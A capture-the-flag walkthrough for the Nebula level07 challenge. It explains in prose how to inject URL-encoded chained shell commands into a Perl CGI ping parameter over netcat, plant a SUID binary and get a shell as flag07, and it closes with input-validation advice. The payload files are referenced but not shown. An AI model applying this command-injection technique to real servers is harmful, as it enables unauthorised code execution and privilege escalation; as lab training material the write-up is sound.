For the level07 challenge we have some Perl code to analyze. This code is available both on the Virtual Machine and the page of the challenge.
What you’ll need to know…
- Perl basics
- Webservers
- Netcat
Level07
In this level07, we’ll need to operate a webserver.
For that, we’ll use netcat to connect to the webserver. You can see on what port the webserver is listening by looking at the file thttpd.conf under the option “port”.
After connecting to the server, you can give him HTTP methods, for example GET, if you want to request something from the server.
Now, let’s give the server the following command: “GET /index.cgi?Host=localhost HTTP/1.1” and on the next line “Host: localhost”. The webserver, will ping the localhost, under flag07 user. So if we use chaining commands once more, we should be able to have the server running commands for us.
Ok, but type all of that while testing is boring, so let’s put it in a file redirect it to netcat. Just use the command “nc localhost 7007 < file”.
Now, for me, the next step is to create the SUID program (the same that we used for multiple exercises). Then, I’ll create a simple script to compile the C program and to set the SUID bit. Here’s what my C program looks like.
And here is my shell script.
Now we just need to update the file that we’ll pass to the netcat. Remember that, to send multiple commands at the same time to the shell, we need to use “;”, but we’ll have to code them so that the webserver won’t interpret these characters. To do that, we just need to use the % symbol, followed by the number in hexadecimal that represents that char in the ASCII table. Here’s the file that I’ll pass to the netcat connection. One advice: place all the files in the /tmp folder, so that you won’t have problems with permissions.
Notice that all the reserved characters were encoded. If you now make the connection to the webserver using netcat, feeding it the file with the HTTP request, you’ll the same output as the first image. But when you look into the /home/flag07 folder you can see our moveaxme SUID program.
Now, it’s just a matter of running this little program and you’ll have a shell under the flag07 account. After that, just collect the flag.
Solved!
Challenges completed: 8/20
Mitigation
Input validation and sanitization is something very important regarding not just webservers, but all kinds of applications. So, if the idea of the program was just getting some IP to ping, the program would only allow the dot symbol in the string given by the user.
Never trust the input!